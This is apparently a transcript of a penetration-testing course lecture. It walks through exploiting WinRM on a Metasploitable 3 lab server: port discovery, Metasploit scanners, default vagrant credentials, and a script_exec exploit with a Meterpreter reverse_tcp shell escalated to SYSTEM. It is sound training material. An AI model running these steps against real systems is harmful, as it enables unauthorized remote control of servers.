Server-side exploitation. In this section, we're going to be talking about all things related to servers and services. This is going to include applications as well as the infrastructure that is used as part of the network to supply files and other resources to people and clients on the network. So let's go ahead and get started. We'll start out with the server-side exploitation types. So what exactly does that mean? Well, when one starts talking about server exploits, they're usually going to think about Windows servers. This is because these are the most commonly exploited servers. However, there are many other types of servers and subsequent services that are available to be exploited. These not only include Windows, but they also include Linux and running services there, such as web servers, databases, and protocols like RDP for Remote Desktop Protocol. We also have infrastructure components such as firewalls and routers. We have voice over IP systems or VoIP. We also have IoT devices. Many of these elements can run on Windows or Unix-based systems. However, the vast majority of them are going to end up running on Windows machines for the most part. So when systems are put on the network, they become an asset to that network, but they also become a source that could be compromised or exploited in a pen test. The biggest item to be aware of here is that attacks on servers here tend to have the greatest impact on the network, just due to the role that they play, compared to, say, a workstation. If I compromise a workstation and a user, I've compromised them. I might get their email, I might get a few other things, I might even be able to pivot a little and move around in the network, but I'm still just a user. I need to get further context or elevate privileges. But if I exploit a server, I have access to the many clients that would connect to that server, as well as whatever artifacts that they leave behind. So let's take a look at a server-based exploit. In the Metasploit 3 that you downloaded, take a look at the Windows server that was installed. If you perform a full port scan, you're going to find that there's a port, 5985, that is available. It's not a well-known port, and we don't have much information on it. Even Nmap just describes it as Microsoft HTTP API. Might suggest that it's web-based or something related to that, but we're still not sure. So at this point, we need to get a little bit more information. Then we can pivot on that information to find more information and hopefully, in the end, find an exploit. Right now, all we really know is what port it's running on, and it has something to do with, it says HTTP API. So is it a web server? Is it something else? Could possibly be. In order to test this, you're going to have to actually connect to it in one way or another. If we try to connect to it just from like a command line using the wget application to the IP address and port, the response you get back is a 404 not found. The 404 response is an HTTP response, so that suggests that it's going to be some kind of web server or web-based application. However, it doesn't respond when you try to use HTTP-based requests, which is exactly what wget does. And if you were to open up a web browser and attempt the same connection, you'd be met with the same 404 reaction. So now we're kind of stuck, right? We need to do something. So the next thing that you're going to do is search for what port 5985 is commonly used for. Or is there something information about the Microsoft HTTP API that we could pivot on and eventually find out what this service or server is doing? Open up a web browser and search for information on port 5985 and what it's used for. The results of the search will tell us that it's related to WS management and PowerShell remoting. So we know it's a Microsoft related type product and that we might have some more information we can gather. If we dig a little bit deeper, we'll also find out that it's related to something called WinRM, and that the port for WinRM is 5985, which is the port that we're seeing. Now we actually have something to work with. We can now pivot into Metasploit and see if there are any available vulnerabilities we can leverage against this system, WinRM, or any of the related other pieces that we saw as part of our scans. So let's take a look at what Metasploit will tell us. Turning to our Meterpreter, we're going to search for any exploits or vulnerabilities related to WinRM. At the conclusion of the search, we find that there are a couple of auxiliary scanners and we have at least one exploit that we can use. We're going to start by running the auxiliary scanners and looking for authentication methods or whatever other information we can retrieve from the scanner information. So filling in the information with we check show options and complete the required settings to set our hosts and the IP addresses of the server we wish to look at, and then we run it. What the scanner does is check if basic protocols are supported, and it adds this information to the Metasploit loot, which means it won't always display right to the screen. So when completed, we would have to confirm that information by looking at what's recorded in the loot. And this can be seen, it shows the basic protocols were supported. However, we would like to see what it says from the services return. So now we're going to check the services by entering in the IP address with a -P and the port number, and we'll see that it shows basic authentication and the method is negotiate basic. Because we already have a login ID and password information for this system, performing another search for WinRM, we can leverage the WinRM CMD. This will allow us to execute basic commands through the WinRM open port. So we go ahead and use that auxiliary scanner for WinRM_CMD. And once we get it loaded, we check our settings. We show our options and we see that we need our hosts set again. The username and password will also need to be set. Entering this information, we're going to set the username to Vagrant and the password also to Vagrant. Then checking the settings once more, we're going to show the options to confirm everything and make sure that we've got all the pieces that we need to have in place. Once confirmed, we're going to go ahead and execute it, and we get a return back showing the IP address and some basic, simple information. Now we know that the port's available and that it will respond to this user ID and password being passed into it. Now, using this information, we can pivot over to the exploit and see if we can get a Meterpreter session to run on it. Searching again for WinRM to see what exploit it is so that we can go ahead and leverage it. Once found, we're going to use the use command to load that exploit and then set the options. So we start out with use/Windows/WinRM/script_exec. Then we're going to do show options to check for what settings need to be set. We find that our host is one of the settings that needs to be performed. So we set our host to 192.168.100.52. Next, we set the username to Vagrant and the password to Vagrant. A payload is also going to be needed. In this case, what we want is a Meterpreter session. So we're going to set our payload to Windows/Meterpreter/reverse_TCP. We also have to show options once more to make sure that everything's all set. And we find out that we have to set lhost. So we set our lhost option, setting it to our attacker machine, which in this case is 192.168.100.108. Once completed, we execute the exploit. Now this particular exploit and payload system is going to connect to WinRM services, and then it's going to implement and run a PowerShell script on the remote machine. If successful, it will execute the PowerShell, and then it will attempt to escalate privileges on that system to the NT authority system, which is the highest level privileges. Once complete, a Meterpreter shell will be returned back to the attacker. When executing this particular set of commands, it tends to take a few minutes for it to complete. But once it's complete, you should have a full Meterpreter session. So let's walk through all the steps that are in the process. Right now, it is checking for PowerShell 2.0, and then attempting to set the execution policy on the remote system. It will then access the temp directory and attempt to upload the script that was compiled and made for it. It will set the stager and has a interpreter session, and it is now escalating the privileges. During this process, it migrates itself to services.exe, which is part of the NT authority system, and again is the one that has the highest level privileges. During exploitation, a couple of no replies will come back while they're executing the script. It's perfectly normal. We can then check our ID with a getuid command, and we will see that we are NT authority system, so we know that part of the exploit worked. And we can run sysinfo and see that we have full control over the system. At this point, you've now seen how to exploit a system from analyzing a port, which is where we started from, and determine what services or service was using it. We then found an exploit which leveraged that particular port and service, and then we got a interpreter session running.